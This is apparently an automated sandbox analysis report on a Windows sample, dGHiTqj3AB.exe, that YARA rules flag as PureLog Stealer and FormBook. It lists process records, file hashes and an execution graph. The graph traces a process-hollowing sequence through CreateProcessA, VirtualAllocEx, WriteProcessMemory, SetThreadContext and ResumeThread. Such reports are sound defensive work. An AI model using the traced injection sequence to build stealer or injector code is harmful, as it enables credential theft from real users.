                                              Path:C:\Users\user\Desktop\dGHiTqj3AB.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\dGHiTqj3AB.exe"
                                              Imagebase:0x910000
                                              File size:951'296 bytes
                                              MD5 hash:1F5C95D40C06C01300F0A6592945A72D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1754732124.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1757860800.00000000072B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              Target ID:2
                                              Start time:07:55:27
                                              Start date:26/07/2024
                                              Path:C:\Users\user\Desktop\dGHiTqj3AB.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\Desktop\dGHiTqj3AB.exe"
                                              Imagebase:0x310000
                                              File size:951'296 bytes
                                              MD5 hash:1F5C95D40C06C01300F0A6592945A72D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:3
                                              Start time:07:55:27
                                              Start date:26/07/2024
                                              Path:C:\Users\user\Desktop\dGHiTqj3AB.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\dGHiTqj3AB.exe"
                                              Imagebase:0xc80000
                                              File size:951'296 bytes
                                              MD5 hash:1F5C95D40C06C01300F0A6592945A72D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2264611220.0000000001770000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2264611220.0000000001770000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2266277321.0000000002810000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2266277321.0000000002810000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:low
                                              Has exited:true

                                              Target ID:7
                                              Start time:07:56:11
                                              Start date:26/07/2024
                                              Path:C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe"
                                              Imagebase:0x920000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3492876557.0000000002DD0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3492876557.0000000002DD0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:false

                                              Target ID:8
                                              Start time:07:56:12
                                              Start date:26/07/2024
                                              Path:C:\Windows\SysWOW64\mcbuilder.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\SysWOW64\mcbuilder.exe"
                                              Imagebase:0x510000
                                              File size:80'896 bytes
                                              MD5 hash:CAE8E531CD82401A9ECB4C446CBB964B
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3492992987.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3492992987.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3492771051.0000000003450000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3492771051.0000000003450000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              Reputation:low
                                              Has exited:false

                                              Target ID:9
                                              Start time:07:56:39
                                              Start date:26/07/2024
                                              Path:C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe"
                                              Imagebase:0x920000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3492695958.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3492695958.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:false

                                              Target ID:11
                                              Start time:07:56:55
                                              Start date:26/07/2024
                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                              Imagebase:0x7ff6bf500000
                                              File size:676'768 bytes
                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                                Execution Graph

                                                Execution Coverage:11.4%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:3%
                                                Total number of Nodes:331
                                                Total number of Limit Nodes:5
36461->36461 36462->36461 36468 10244b4 36462->36468 36466 1024888 36464->36466 36465 102498c 36465->36465 36466->36465 36467 10244b4 CreateActCtxA 36466->36467 36467->36465 36469 1025918 CreateActCtxA 36468->36469 36471 10259db 36469->36471 36473 1025c4f 36472->36473 36476 1025c64 36473->36476 36475 10270ed 36475->36459 36477 1025c6f 36476->36477 36480 1025c94 36477->36480 36479 10271c2 36479->36475 36481 1025c9f 36480->36481 36482 1025cc4 4 API calls 36481->36482 36483 10272c5 36482->36483 36483->36479 36484 755def8 36485 755e083 36484->36485 36486 755df1e 36484->36486 36486->36485 36488 755a558 36486->36488 36489 755e580 PostMessageW 36488->36489 36491 755e5ec 36489->36491 36491->36486 36492 755c328 36493 755c332 36492->36493 36494 755c38a 36492->36494 36497 755cc38 36493->36497 36516 755cc48 36493->36516 36498 755cc3c 36497->36498 36499 755cc86 36498->36499 36535 755d86d 36498->36535 36539 755daed 36498->36539 36543 755d1a0 36498->36543 36548 755d3e1 36498->36548 36553 755d484 36498->36553 36558 755d23e 36498->36558 36563 755d71f 36498->36563 36568 755d17c 36498->36568 36573 755d11c 36498->36573 36581 755d1dd 36498->36581 36588 755d472 36498->36588 36593 755d417 36498->36593 36598 755d7b5 36498->36598 36602 755d44a 36498->36602 36607 755d60b 36498->36607 36611 755d50f 36498->36611 36499->36494 36517 755cc4b 36516->36517 36518 755d7b5 2 API calls 36517->36518 36519 755cc86 36517->36519 36520 755d417 2 API calls 36517->36520 36521 755d472 2 API calls 36517->36521 36522 755d1dd 4 API calls 36517->36522 36523 755d11c 4 API calls 36517->36523 36524 755d17c 2 API calls 36517->36524 36525 755d71f 2 API calls 36517->36525 36526 755d23e 2 API calls 36517->36526 36527 755d484 2 API calls 36517->36527 36528 755d3e1 2 API calls 36517->36528 36529 755d1a0 2 API calls 36517->36529 36530 755daed 2 API calls 36517->36530 36531 755d86d 2 API calls 36517->36531 36532 755d50f 2 API calls 36517->36532 36533 755d60b 2 API calls 36517->36533 36534 755d44a 2 API calls 36517->36534 
36518->36519 36519->36494 36520->36519 36521->36519 36522->36519 36523->36519 36524->36519 36525->36519 36526->36519 36527->36519 36528->36519 36529->36519 36530->36519 36531->36519 36532->36519 36533->36519 36534->36519 36536 755d965 36535->36536 36616 755bc30 36536->36616 36620 755bc28 36536->36620 36624 755ba90 36539->36624 36628 755ba98 36539->36628 36540 755d5c7 36540->36539 36544 755d188 36543->36544 36544->36499 36545 755d7da 36544->36545 36632 755bd20 36544->36632 36636 755bd18 36544->36636 36545->36499 36549 755d3ef 36548->36549 36640 755b9e0 36549->36640 36644 755b9e8 36549->36644 36550 755d4b3 36550->36499 36554 755d49e 36553->36554 36556 755b9e0 ResumeThread 36554->36556 36557 755b9e8 ResumeThread 36554->36557 36555 755d4b3 36555->36499 36555->36555 36556->36555 36557->36555 36559 755d261 36558->36559 36561 755bc30 WriteProcessMemory 36559->36561 36562 755bc28 WriteProcessMemory 36559->36562 36560 755d697 36561->36560 36562->36560 36564 755d725 36563->36564 36566 755bc30 WriteProcessMemory 36564->36566 36567 755bc28 WriteProcessMemory 36564->36567 36565 755d8f1 36566->36565 36567->36565 36570 755d188 36568->36570 36569 755d7da 36569->36499 36570->36499 36570->36569 36571 755bd20 ReadProcessMemory 36570->36571 36572 755bd18 ReadProcessMemory 36570->36572 36571->36569 36572->36569 36574 755d122 36573->36574 36648 755beb0 36574->36648 36652 755beb8 36574->36652 36575 755d7da 36575->36499 36576 755d156 36576->36499 36576->36575 36579 755bd20 ReadProcessMemory 36576->36579 36580 755bd18 ReadProcessMemory 36576->36580 36579->36575 36580->36575 36656 755bb70 36581->36656 36660 755bb6b 36581->36660 36582 755d188 36582->36499 36583 755d7da 36582->36583 36586 755bd20 ReadProcessMemory 36582->36586 36587 755bd18 ReadProcessMemory 36582->36587 36583->36499 36586->36583 36587->36583 36589 755d476 36588->36589 36590 755d7da 36589->36590 36591 755bd20 ReadProcessMemory 36589->36591 36592 755bd18 ReadProcessMemory 36589->36592 36590->36499 36591->36590 36592->36590 
36595 755d188 36593->36595 36594 755d7da 36594->36499 36595->36499 36595->36594 36596 755bd20 ReadProcessMemory 36595->36596 36597 755bd18 ReadProcessMemory 36595->36597 36596->36594 36597->36594 36600 755bd20 ReadProcessMemory 36598->36600 36601 755bd18 ReadProcessMemory 36598->36601 36599 755d7da 36599->36499 36600->36599 36601->36599 36603 755d188 36602->36603 36603->36499 36604 755d7da 36603->36604 36605 755bd20 ReadProcessMemory 36603->36605 36606 755bd18 ReadProcessMemory 36603->36606 36604->36499 36605->36604 36606->36604 36609 755ba90 Wow64SetThreadContext 36607->36609 36610 755ba98 Wow64SetThreadContext 36607->36610 36608 755d625 36609->36608 36610->36608 36613 755d188 36611->36613 36612 755d7da 36612->36499 36613->36499 36613->36612 36614 755bd20 ReadProcessMemory 36613->36614 36615 755bd18 ReadProcessMemory 36613->36615 36614->36612 36615->36612 36617 755bc35 WriteProcessMemory 36616->36617 36619 755bccf 36617->36619 36619->36536 36621 755bc2e WriteProcessMemory 36620->36621 36623 755bccf 36621->36623 36623->36536 36625 755ba98 Wow64SetThreadContext 36624->36625 36627 755bb25 36625->36627 36627->36540 36629 755ba9f Wow64SetThreadContext 36628->36629 36631 755bb25 36629->36631 36631->36540 36633 755bd27 ReadProcessMemory 36632->36633 36635 755bdaf 36633->36635 36635->36545 36637 755bd20 ReadProcessMemory 36636->36637 36639 755bdaf 36637->36639 36639->36545 36641 755ba28 ResumeThread 36640->36641 36643 755ba59 36641->36643 36643->36550 36645 755ba28 ResumeThread 36644->36645 36647 755ba59 36645->36647 36647->36550 36649 755bf41 CreateProcessA 36648->36649 36651 755c103 36649->36651 36651->36651 36653 755bf41 CreateProcessA 36652->36653 36655 755c103 36653->36655 36655->36655 36657 755bbb0 VirtualAllocEx 36656->36657 36659 755bbed 36657->36659 36659->36582 36661 755bb70 VirtualAllocEx 36660->36661 36663 755bbed 36661->36663 36663->36582

                                                Control-flow Graph (starts at 5337170)
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1756552176.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5330000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Pp^q
                                                • API String ID: 0-3179448734
                                                • Opcode ID: 36272ad50058aa1ac75229fd656ada4c85e1c5181d254982e962d8d5c93ef60d
                                                • Instruction ID: c96db9256a02d638353a403179a4241f7f90e2996d34a605ef9e28513c742ae5
                                                • Opcode Fuzzy Hash: 36272ad50058aa1ac75229fd656ada4c85e1c5181d254982e962d8d5c93ef60d
                                                • Instruction Fuzzy Hash: 2D03D934A4121ACFCB54EF64C895AE9B7B2FF89304F1145E9E409AB361DB71AE85CF40

                                                Control-flow Graph (starts at 5337163)
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1756552176.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5330000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Pp^q
                                                • API String ID: 0-3179448734
                                                • Opcode ID: 4df2a197a6dd2745f3cfdccaab7e9c558bc1ccc1f8abed45d9886f4a9bc38341
                                                • Instruction ID: 2ec4a058943c85bdd657f1f0a8137911f36f0cca64b00f6ebdf7396022453e60
                                                • Opcode Fuzzy Hash: 4df2a197a6dd2745f3cfdccaab7e9c558bc1ccc1f8abed45d9886f4a9bc38341
                                                • Instruction Fuzzy Hash: CCF2D734A4121ACFC754EF64C899AE9B7B1FF89304F1145E9E409AB361DB71AE85CF40
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1758543029.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7550000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1173b6658c5dd55a5fe4b06ee4583f8b76ec896e88d85448792303caa33c4e81
                                                • Instruction ID: c77d5addc8cc76101e1bbe67761a16ff18f3bab1b98bd0b631bfcc05c2d79b11
                                                • Opcode Fuzzy Hash: 1173b6658c5dd55a5fe4b06ee4583f8b76ec896e88d85448792303caa33c4e81
                                                • Instruction Fuzzy Hash: D432AAB0B012159FDB19DB68C560BAE77F6BF89300F24446AE546DB3A1CF35E901CB91

                                                Control-flow Graph (starts at 755beb0)
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0755C0EE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1758543029.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7550000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID: c
                                                • API String ID: 963392458-112844655
                                                • Opcode ID: 0671d579779d120717e5d65a72e6d4b2f83ebcc2a805ca6d34b18d22b32b3458
                                                • Instruction ID: 09aba642442fde1c04d82d674f99f8a07c882d2710ed7d9e777d990922382e99
                                                • Opcode Fuzzy Hash: 0671d579779d120717e5d65a72e6d4b2f83ebcc2a805ca6d34b18d22b32b3458
                                                • Instruction Fuzzy Hash: 5F915FB1D0031ADFDB14CFA8C8517EDBBB2BF44314F1485AAE849A7290DB749985CF91

                                                Control-flow Graph (starts at 755beb8)
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0755C0EE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1758543029.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7550000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: c1e63afc4a9aa7af6f1c4ef32a8192d5393e074c592c3db74e8046a3d7b304d9
                                                • Instruction ID: 204c8df54cc6c11ffb0497398736a7143cf4721ff3d7650ebd566a374c3165d4
                                                • Opcode Fuzzy Hash: c1e63afc4a9aa7af6f1c4ef32a8192d5393e074c592c3db74e8046a3d7b304d9
                                                • Instruction Fuzzy Hash: 21914DB1D0031ADFDB14CFA8C8517DDBBB2BF44314F1485AAE849A7290DB749985CF92

                                                Control-flow Graph (starts at 102ada8)
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0102AFFE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1754159534.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1020000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 67162c1a15746e0e786ce57954936b48bbea1955ff39f5eb81dbf0db6e546e26
                                                • Instruction ID: bcea19da893badff08a6bda724a3387c6d531e7766b6b417d36f009fb9e854f8
                                                • Opcode Fuzzy Hash: 67162c1a15746e0e786ce57954936b48bbea1955ff39f5eb81dbf0db6e546e26
                                                • Instruction Fuzzy Hash: 0F714470A00B15CFDB64DF29D58079ABBF5BF88304F008A2DE48AD7A50DB75E949CB90

                                                Control-flow Graph (starts at 53318e4)
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05331A02
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1756552176.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5330000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: f0b550deaa929cf860934ab5625c41ecec85ac6428bd858acecfd0124deb0bef
                                                • Instruction ID: ab8aa91d03df02308de731d1f849590ce6ee8e7a3e6160ef21325d05959aedc8
                                                • Opcode Fuzzy Hash: f0b550deaa929cf860934ab5625c41ecec85ac6428bd858acecfd0124deb0bef
                                                • Instruction Fuzzy Hash: 2951C3B1D103199FDB14CFA9C885ADEBBB5FF88314F24812AE819AB210D7719985CF91

                                                Control-flow Graph (starts at 53318f0)
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05331A02
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1756552176.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5330000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 0b96199b575a3f16a2d9c42ca168fd81d8937c66310968f4ad46e110a605e49e
                                                • Instruction ID: 0c152bcc2d050c94a7f42be578149c665b77a922010f208aa344b0a675e331bd
                                                • Opcode Fuzzy Hash: 0b96199b575a3f16a2d9c42ca168fd81d8937c66310968f4ad46e110a605e49e
                                                • Instruction Fuzzy Hash: 7241C0B1D003099FDB14CFA9C885ADEBBB5BF88310F24812AE819AB210D7709985CF91

                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 010259C9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1754159534.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1020000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 1235b4f6a6e84f12f289c3dd9dbf5bff9b1873c9f3fbc2c3e9fb6bdc0503d195
                                                • Instruction ID: c2722411ce57ae261f633c4f8491d6e7912012f174042098dfac827c6c5b46b5
                                                • Opcode Fuzzy Hash: 1235b4f6a6e84f12f289c3dd9dbf5bff9b1873c9f3fbc2c3e9fb6bdc0503d195
                                                • Instruction Fuzzy Hash: E641D2B0C00729CBDB24DFA9C8857DDBBF5BF49304F24809AD448AB255DB756946CF90

                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 010259C9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1754159534.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1020000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: ae1b829acfc17413680c5e62f16dafe658fb2d2fb4ac2191f40e599cd2ca5fc8
                                                • Instruction ID: 48f3d23638e3f4a3365312ba791ec4cdbde5f5d7c35db450e3bf423947cf703f
                                                • Opcode Fuzzy Hash: ae1b829acfc17413680c5e62f16dafe658fb2d2fb4ac2191f40e599cd2ca5fc8
                                                • Instruction Fuzzy Hash: F241D2B0C00729CEDB24CFA9C8857DDBBF5BF49304F2481AAD448AB255DB756946CF90

                                                APIs
                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 05334101
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1756552176.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5330000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: CallProcWindow
                                                • String ID:
                                                • API String ID: 2714655100-0
                                                • Opcode ID: 1cdd90c76ed28cb5ecdc3af2be3a389f580c84302d59572c31d1a07ba870d912
                                                • Instruction ID: d4419166da842c0efc4592f94c1ae7e1c208f8a955a3e92c51153387c27a4176
                                                • Opcode Fuzzy Hash: 1cdd90c76ed28cb5ecdc3af2be3a389f580c84302d59572c31d1a07ba870d912
                                                • Instruction Fuzzy Hash: 1041E9B5A00609CFCB14CF99C449AAAFBF5FF88314F24C459E519AB361D775A841CFA0

                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0755BCC0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1758543029.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7550000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 9c5b4756a7ff1a50062005fc401c6fe1fe42755f690d774b0a9147c4051b9f92
                                                • Instruction ID: 62a7d4ba60f59b29ee0adfe347b3e9e935eec865009983002417d6e2fed7c0bd
                                                • Opcode Fuzzy Hash: 9c5b4756a7ff1a50062005fc401c6fe1fe42755f690d774b0a9147c4051b9f92
                                                • Instruction Fuzzy Hash: 473147B190035A9FCB10CFA9C885BDEBFF5FF48310F10842AE958A7240D7789545CBA4
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0755BDA0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1758543029.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7550000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 004aed8b32d729a59aa824c9316db4eb053c70043a8e8f69185fc19d40ba5de3
                                                • Instruction ID: ef9503a17add2de488d0f04409286ab9aa322659b53556e0cf6326ada7e72f5d
                                                • Opcode Fuzzy Hash: 004aed8b32d729a59aa824c9316db4eb053c70043a8e8f69185fc19d40ba5de3
                                                • Instruction Fuzzy Hash: DC2135B1900259DFCB10CFAAC885BEEBBF5FF48310F20842AE958A7250D7759945CBA4
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0755BB16
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1758543029.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7550000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 448efdd64251fc8ac077f021153787087d922b58fc9707b8c2a7895e9db90f65
                                                • Instruction ID: ce0b33c798e7384b1d933b1b85e7e30b8fb3f22602e8c645fb0603e06dc1cb40
                                                • Opcode Fuzzy Hash: 448efdd64251fc8ac077f021153787087d922b58fc9707b8c2a7895e9db90f65
                                                • Instruction Fuzzy Hash: 482169B19002098FDB10DFA9C4857EEBBF5FF88324F24842AD458A7240CB789945CBA4
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0755BCC0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1758543029.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7550000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: a4d38f3083a1e5add38689f468c2c81d64ebf0e54b8ecd95e3d32d112405133f
                                                • Instruction ID: a0ef43fe94a21ca71e44dfb7c93ac2bf3271913fc8d65ab0b038a7a7eda3ee22
                                                • Opcode Fuzzy Hash: a4d38f3083a1e5add38689f468c2c81d64ebf0e54b8ecd95e3d32d112405133f
                                                • Instruction Fuzzy Hash: 752139B1D0035A9FCB10CFA9C885BDEBBF5FF48310F10842AE959A7250D7789944CBA4
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0102D656,?,?,?,?,?), ref: 0102D717
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1754159534.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1020000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: f3547efff7a067678498527cd6911437a6c48a3b81729cba295bcf650f6aa3ce
                                                • Instruction ID: 9b6a77dc042cce8fae51b823e6263f7020ae13a4326350acfcf36be0adbe4e1d
                                                • Opcode Fuzzy Hash: f3547efff7a067678498527cd6911437a6c48a3b81729cba295bcf650f6aa3ce
                                                • Instruction Fuzzy Hash: D52103B5900258DFDB10CFAAD484ADEBBF8FB48310F14801AE958A7310D378A940CFA5
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0755BDA0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1758543029.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7550000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: cb642ed329b9bf599af42379b35b9b9e8fa823f69ec4350bf76e047980770949
                                                • Instruction ID: 0979f68c32e9b595c3dfcb8c203febedd1029c6e424770c5755d7c14f1fb983c
                                                • Opcode Fuzzy Hash: cb642ed329b9bf599af42379b35b9b9e8fa823f69ec4350bf76e047980770949
                                                • Instruction Fuzzy Hash: 432128B1C002599FCB10DFAAC885BDEFBF5FF88310F10842AE958A7250C7749544CBA5
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0755BB16
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1758543029.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7550000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
